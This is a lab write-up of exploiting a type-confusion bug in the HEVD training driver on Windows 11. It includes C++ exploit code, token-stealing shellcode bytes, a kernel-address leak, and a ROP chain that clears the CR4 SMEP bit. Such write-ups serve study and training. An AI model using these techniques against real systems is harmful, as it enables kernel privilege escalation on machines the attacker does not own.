How did a simple K-TypeConfusion take me 3 months to exploit? [HEVD] - Windows 11 (build 22621)
Have you ever tested something for so long that it became part of your life? That’s what happened to me over the last few months, when a simple TypeConfusion vulnerability almost drove me crazy!
Introduction
In this blog post, we will talk about my experience with a simple vulnerability that, for some reason, turned out to be the hardest and most confusing thing I have ever seen in the context of kernel exploitation.
We will cover the following topics:
- TypeConfusion: how this vulnerability affects the Windows kernel, and how we as researchers can build an exploit from User-Land in order to get Privileged Access on the operating system.
- ROPchain: a method to make the RIP register jump through Windows kernel addresses in order to execute code. With this technique, we can control the order of execution through our Stack, and from there reach the User-Land Shellcode.
- Kernel ASLR Bypass: a way to Leak kernel memory addresses; with the correct base address, we’re able to calculate the memory regions we want to use later.
- Supervisor Mode Execution Prevention (SMEP): a mechanism that blocks kernel-mode execution of code located at user-land addresses. If it is enabled on the operating system, you can’t JMP/CALL into User-Land from the kernel, so you can’t simply execute your shellcode directly. This protection has been present since Windows 8.0 (32/64 bits).
- Kernel Memory Management: important information about how the kernel interprets memory, including Memory Paging, Segmentation, Data Transfer, etc., plus a description of how memory is laid out and used by the Operating System.
- Stack Manipulation: the stack is the most prominent thing you will see in this blog post. All my research revolves around it, and after rebooting my VM a million times, I finally understand a few concepts that you must consider when writing a Stack Based exploit.
VM Setup
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys
Tips for Kernel Exploitation coding
The default Windows headers can often slow down exploit development, because they ship their own, limited definitions of internal structures and enums, apparently to discourage attackers or anyone else from relying on or manipulating internal values. In many C/C++ projects, you will find includes like the following:
#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>
When winternl.h is included, the definitions of numerous structs and enums used by these functions are taken from that header:
// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>
The problem is that when you call functions such as NtQuerySystemInformation from User-Land on “recent” Windows versions, the definitions you get from the header differ from what you need. For example, the information class used below, SystemModuleInformation = 11, is typically not declared there. This prevents the use of the very queries that can leak kernel base addresses, and consequently delays our exploitation phase. So it’s important to write the code without winternl.h and to define the required structs manually, as in the example below:
#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>
#include <cstdint> // uint64_t
#define QWORD uint64_t
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);
// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
INT64 GetKernelBase() {
// Leak the ntoskrnl.exe base address (first entry in the module list) to bypass KASLR
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
With this approach, we can use the correct struct definitions and values without any trouble.
TypeConfusion vulnerability
Using the IDA reverse engineering tool, we can clearly see the IOCTL that executes our vulnerable function.
After reversing TriggerTypeConfusion, we have the following code:
// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}
As you can see, the function expects two values from a user-controlled struct named _USER_TYPE_CONFUSION_OBJECT. This struct contains (ObjectID, ObjectType) as members, which are copied into a kernel-side _KERNEL_TYPE_CONFUSION_OBJECT. After copying them, the driver calls TypeConfusionObjectInitializer on the kernel object. The vulnerable code is shown below:
__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}
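The vulnerability in the code above lies in the unrestricted call through _KERNEL_TYPE_CONFUSION_OBJECT->ObjectType. As the pseudo-code shows, ObjectType and Callback refer to the same field of the kernel object, so the value we supplied as ObjectType is treated as a function pointer and called, which means the kernel calls a user-controlled address.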
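To make the confusion concrete, here is a minimal sketch of how the two objects might be laid out. The struct and constant names are hypothetical mirrors of what the decompiled output suggests (they are not copied from the driver source), and the union is an assumption based on ObjectType and Callback being used interchangeably in the pseudo-code.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical mirror of the user-mode input: two plain 64-bit values.
struct UserTypeConfusionObject {
    std::uint64_t ObjectID;
    std::uint64_t ObjectType;
};

using CallbackFn = void (*)();

// Hypothetical mirror of the kernel object: ObjectType and Callback
// overlap, so whatever is written as a "type" can be called as code.
struct KernelTypeConfusionObject {
    std::uint64_t ObjectID;
    union {
        std::uint64_t ObjectType;
        CallbackFn Callback;
    };
};

// Both members start at the same byte inside the kernel object.
constexpr std::size_t kObjectTypeOffset = offsetof(KernelTypeConfusionObject, ObjectType);
constexpr std::size_t kCallbackOffset = offsetof(KernelTypeConfusionObject, Callback);
```

Because both members share one offset, copying the user-supplied ObjectType into the kernel object also sets Callback, and no check ever confirms that the value is a valid kernel function.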
Exploit Initialization
Now that we understand the vulnerability, let’s focus on the exploit phases.
First of all, we write code to communicate with the HEVD driver through an IRP, using the IOCTL we found earlier (0x222023), and then send our malicious buffer.
<...snip...>
// ---> Malicious Struct <---
typedef struct _USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
} USER_CONTROLLED_OBJECT;
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
exploit();
return 0;
}
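The IOCTL value 0x222023 used above is not arbitrary: it follows the bit layout of the CTL_CODE macro from the Windows SDK. The sketch below re-implements that layout in portable C++ so the value can be checked by hand; the helper names ctl_code and decode_ioctl are hypothetical, and the field values are simply derived from the number itself.

```cpp
#include <cassert>
#include <cstdint>

// Same bit layout as the CTL_CODE macro:
// (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
constexpr std::uint32_t ctl_code(std::uint32_t device_type, std::uint32_t function,
                                 std::uint32_t method, std::uint32_t access) {
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

struct IoctlFields {
    std::uint32_t device_type; // 0x22 is FILE_DEVICE_UNKNOWN
    std::uint32_t access;      // 0 is FILE_ANY_ACCESS
    std::uint32_t function;    // driver-defined function number
    std::uint32_t method;      // 3 is METHOD_NEITHER
};

// Split an IOCTL code back into its four fields.
constexpr IoctlFields decode_ioctl(std::uint32_t code) {
    return { code >> 16, (code >> 14) & 0x3u, (code >> 2) & 0xFFFu, code & 0x3u };
}
```

Decoding 0x222023 gives device type 0x22, function 0x808 and method 3 (METHOD_NEITHER), which matches the driver reading our user-mode pointer directly (hence the ProbeForRead call in the pseudo-code).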
After we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECT should look like this.
Now we can clearly understand where exactly this vulnerability lies. The next step would be to JMP into our user-controlled buffer containing shellcode that escalates us to SYSTEM privileges. The issue with this idea is a protection mechanism called Supervisor Mode Execution Prevention, a.k.a. SMEP.
Supervisor Mode Execution Prevention (SMEP)
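The main idea behind SMEP is to prevent kernel-mode code from executing (CALL/JMP into) user-land addresses. If the SMEP bit in the CR4 register is set to [1], the processor refuses to fetch instructions from user-mode pages while running in supervisor mode, which protects the kernel from this class of attack.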
According to Core Security:
SMEP: Supervisor Mode Execution Prevention allows pages to be protected from supervisor-mode instruction fetches. If SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.
- Detects RING-0 code running in USER SPACE
- Introduced at Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially “Local Privilege Escalation” exploits must now consider this feature.
Then let’s see in a practical test whether it is actually working properly.
<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
After the exploit runs, we get something like this:
The BugCheck analysis should be similar to the following:
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>
As we can see, SMEP is working as expected. The following steps cover how we can manipulate our addresses so that the processor is able to execute our shellcode buffer.
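The PTE contents reported in Arg2 can be decoded by hand to confirm that SMEP, rather than a non-executable page, stopped the shellcode. This is a minimal sketch assuming the standard x64 page-table entry layout (bit 0 Present, bit 1 Read/Write, bit 2 User/Supervisor, bit 63 No-Execute); the helper names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

struct PteFlags {
    bool present;    // bit 0
    bool writable;   // bit 1
    bool user;       // bit 2: page is accessible from user mode
    bool no_execute; // bit 63: NX
};

// Extract the flag bits that matter for this crash from a raw PTE value.
constexpr PteFlags decode_pte(std::uint64_t pte) {
    return { (pte & (1ULL << 0)) != 0,
             (pte & (1ULL << 1)) != 0,
             (pte & (1ULL << 2)) != 0,
             (pte & (1ULL << 63)) != 0 };
}

// A present, executable, user-mode page is exactly what SMEP refuses
// to fetch instructions from while the CPU runs in supervisor mode.
constexpr bool blocked_by_smep(std::uint64_t pte) {
    return decode_pte(pte).present && decode_pte(pte).user && !decode_pte(pte).no_execute;
}
```

For the value 00000001db4ea867 from the bug check, the page is present, user-accessible and has NX clear, so the page itself is executable and the fault comes from the kernel trying to run it.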
Return-Oriented Programming against SMEP
Return-Oriented Programming, a.k.a. ROP, is a technique that allows an attacker to manipulate the instruction pointer and the return addresses on the current stack. With this type of attack, we can effectively program in assembly by chaining execution from one existing address to the next.
As CTF101 mentioned:
Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things. As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don’t have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.
The main idea for our exploit is to use a ROP chain to achieve arbitrary code execution. But how?
x64 CR4 register
As one of the Control Registers, the CR4 register holds a set of bit flags whose value can vary between operating systems and machines.
When SMEP is supported, one of these bits tells the processor whether SMEP is enabled, and based on it the processor decides, while executing kernel code, whether a CALL/JMP into user-land addresses is allowed.
As Wikipedia says:
A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.
On my operating system build, Windows 11 22621, we can clearly see this register’s value in WinDBG:
The main idea now is to flip the correct bit in order to neutralize SMEP, and after that JMP into the attacker shellcode.
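The bit in question is bit 20 of CR4 (CR4.SMEP in the Intel manuals). As a minimal sketch of the arithmetic, the helpers below (hypothetical names) test and clear that bit, using 0x3506f8, the CR4 value that appears in the exploit code later in this post, as the sample input.

```cpp
#include <cassert>
#include <cstdint>

// CR4.SMEP is bit 20 of the CR4 control register.
constexpr std::uint64_t kCr4SmepBit = 1ULL << 20;

// True when the given CR4 value has SMEP enabled.
constexpr bool smep_enabled(std::uint64_t cr4) {
    return (cr4 & kCr4SmepBit) != 0;
}

// Return the same CR4 value with only the SMEP bit cleared.
constexpr std::uint64_t clear_smep(std::uint64_t cr4) {
    return cr4 & ~kCr4SmepBit;
}
```

With this input, clear_smep(0x3506f8) gives 0x2506f8. The sketch uses AND-NOT instead of XOR so that applying it to a value where SMEP is already off does not turn the bit back on; every other bit must stay exactly as the OS set it.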
With this in mind, we need to get back to our exploit source code and craft our ROP chain to achieve our goal. The question is, how?
We know that we need to change the CR4 value and that a ROP chain can help us, but first we need to bypass Kernel ASLR, because kernel addresses are randomized. The following steps cover how to get the correct gadgets for the attacks that follow.
Virtualization-based security (VBS)
When manipulating the CR4 register through a ROP chain, it’s important to note that if the attacker miscalculates the value during the bit-change phase of the exploit and Virtualization-based security is enabled, the system catches the exception and crashes after the attempt to change the CR4 register value.
According to Microsoft:
Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly.
If for some reason you see an error like the one below, it is probably a miscalculation of the value that should be placed into the CR4 register.
<...snip...>
// An example of a miscalculated CR4 value
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
WinDBG output:
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.
Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409
KASLR Bypass with NtQuerySystemInformation
As mentioned before, NtQuerySystemInformation is a function that, if used correctly, can leak kernel module base addresses when performing system query operations. Through the results of these queries, we can leak kernel memory addresses from user-land.
As mentioned by Trustwave:
The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscall IDs.
<…snip…>
The function basically retrieves specific information from the environment and its structure is very simple
<…snip…>
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects and others.
So now we have a question: if we can leak addresses and calculate the offset from the base address to our gadget, how can we search memory for these gadgets?
The solution is as simple as follows:
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
With the file rop.txt we have addresses, but we’re still “unable” to pick the correct ones for a valid calculation.
The nt module, for example, sometimes uses addresses inside itself as “buffers”, and the data there can point to other, invalid locations. At kernel level, the contents “change”, and with all these “changes” you will never hit the correct offset through a simple .writemem dump.
The biggest issue is that .writemem dumps a module from its start to its end address, but the resulting file does not line up with the offsets of functions in live memory. This happens because of module segments and mutable data that change over time as the OS does its work. For example, if we search for opcodes using the WinDBG command line, there is a static buffer address that returns exactly the opcodes we typed.
The addresses above seem to be valid, and they are identical to our opcodes. The problem is that 0xfffff80051ef8500 is a buffer, and it returns everything we put into the WinDBG search function [s command]. So no matter how you change the opcodes, the search always finds them again in that buffer.
OK, now let’s say that ROPgadget.py returns the following output:
--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret
If we check whether those opcodes are the same in our current VM, we’ll notice something like this:
As you can see, the offset from .writemem is invalid, meaning that something went wrong. A simple fix for this issue is to look through the ROPgadget output for the assembly code we need, convert that code into opcodes, and then search the current, valid memory for those opcodes to find the addresses for our ROP chain.
4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
Now we know that the nt base address 0xfffff80051200000 + 0x00000000002ce4c0 results in nt!ExfReleasePushLock+0x20.
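The calculation in step 7 is plain subtraction, and at exploit time the same offset is added back to whatever base address was leaked. A minimal sketch of both directions follows; the helper names are hypothetical and the addresses are the ones from the WinDBG session above.

```cpp
#include <cassert>
#include <cstdint>

// Offset of a gadget inside its module: gadget address minus module base.
constexpr std::uint64_t gadget_offset(std::uint64_t gadget_va, std::uint64_t module_base) {
    return gadget_va - module_base;
}

// Address of the same gadget after a reboot: leaked base plus the offset.
constexpr std::uint64_t rebase(std::uint64_t leaked_base, std::uint64_t offset) {
    return leaked_base + offset;
}
```

The offset stays valid only for this exact kernel build. KASLR changes the base on every boot, but a different ntoskrnl.exe version moves the gadget itself, so the offset has to be recomputed after an update.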
Stack Pivoting & ROP chain
With the previous idea of what exactly a ROP chain is, it’s now important to know which gadgets we need in order to change the CR4 register value using only kernel addresses.
STACK PIVOTING:
mov esp, 0x48000000
ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one
// The logic for the ROP chain
// 1 - Allocate memory in the 0x48000000 region
// 2 - When we move the 0x48000000 address into our ESP/RSP register,
// we control the sequence of addresses that we'll [CALL/JMP] to.
Now that we know the logic of our ROP chain, we need to discuss the Stack Pivoting technique.
Stack pivoting basically means swapping the current kernel stack for a user-controlled Fake Stack; this is done by changing the RSP register value. When we point RSP at a user-controlled stack, we can drive execution through a ROP chain, since every ret then pops the next kernel address from memory we control.
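The pivot gadget found earlier is mov esp, 0x48000000 ; add esp, 0x28 ; ret. On x64, writing a 32-bit register such as ESP zeroes the upper 32 bits of RSP, which is why a short gadget can move the stack from a kernel address to a low user-land one. The sketch below only simulates that register arithmetic; the function names are hypothetical and nothing here touches real registers.

```cpp
#include <cassert>
#include <cstdint>

// mov esp, imm32: the 32-bit write zero-extends, so the old RSP is discarded.
constexpr std::uint64_t mov_esp_imm32(std::uint32_t imm) {
    return imm;
}

// add esp, imm: 32-bit addition, result again zero-extended into RSP.
constexpr std::uint64_t add_esp_imm(std::uint64_t rsp, std::uint32_t imm) {
    return static_cast<std::uint32_t>(static_cast<std::uint32_t>(rsp) + imm);
}

// RSP right before the gadget's ret: the address of the first chain entry.
// The previous kernel RSP is irrelevant, so the parameter is unnamed.
constexpr std::uint64_t rsp_after_pivot(std::uint64_t /*kernel_rsp*/) {
    return add_esp_imm(mov_esp_imm32(0x48000000u), 0x28u);
}

// ret pops 8 bytes, so the next chain entry sits one QWORD higher.
constexpr std::uint64_t rsp_after_ret(std::uint64_t rsp) {
    return rsp + 8;
}
```

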